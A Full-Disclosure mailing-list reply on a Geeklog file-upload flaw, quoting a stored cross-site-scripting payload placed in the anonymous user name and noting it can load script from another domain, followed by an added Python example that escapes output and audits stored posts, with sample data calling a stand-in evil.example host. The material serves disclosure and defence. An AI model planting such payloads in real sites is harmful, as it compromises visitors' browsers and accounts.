Re: [Full-disclosure] Geeklog <= v1.6.0sr2 - Remote File Upload



On 4 Oct 2009, at 08:47, Jaloh Smith wrote:
The easy one is when the forum allows anonymous posts and is configured for text posts. The anonymous user name is never filtered, so you can put anything there, including a reference to the javascript uploaded as the user profile image.

<script src="../images/userphotos/username.jpg"></script>

That's actually a much worse exploit than the file upload. There's no
reason the script you load has to be stored locally -- it works just
as well if you pull it from another domain.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
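Added example, not from the thread or from Geeklog itself: the fix implied above is to HTML-escape the anonymous user name (and post body) at render time, so the injected tag is displayed as text instead of executed; the audit helper then scans stored posts and separates the local userphotos reference from the remote-domain variant the reply points out. The post records, field names and the evil.example host are constructed for the demonstration.

```python
import html
import re
from urllib.parse import urlparse

# Constructed sample records, shaped like a forum's stored anonymous posts.
# Post 0 mirrors the payload quoted in the thread, post 1 the remote-domain
# variant from the reply, post 2 is a benign anonymous post.
SAMPLE_POSTS = [
    {"username": '<script src="../images/userphotos/username.jpg"></script>',
     "body": "first post"},
    {"username": '<script src="http://evil.example/x.js"></script>',
     "body": "second post"},
    {"username": "Anonymous Coward", "body": "plain text post"},
]

# Matches a <script ... src=...> opening tag and captures the src value.
SCRIPT_SRC_RE = re.compile(
    r'<\s*script[^>]*\ssrc\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)


def render_post(post):
    """Render a text-mode post with every user-controlled field escaped.

    html.escape turns < > & " ' into entities, so a stored <script> tag in
    the user name reaches the browser as literal text and never runs.
    """
    return '<div class="post"><b>{}</b><p>{}</p></div>'.format(
        html.escape(post["username"], quote=True),
        html.escape(post["body"], quote=True),
    )


def classify_username(username):
    """Audit a stored user name: 'clean', 'script:local' or 'script:remote'.

    A src with a network location (http://..., //host/...) is a remote
    script; a bare relative path such as ../images/userphotos/... is local.
    """
    match = SCRIPT_SRC_RE.search(username)
    if not match:
        return "clean"
    host = urlparse(match.group(1)).netloc
    return "script:remote" if host else "script:local"


def audit(posts):
    """Classify every stored post so injected names can be found and purged."""
    return [classify_username(p["username"]) for p in posts]
```

Running audit over the sample data reports the first two records as injected and the third as clean, while render_post emits neither of them as live markup.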
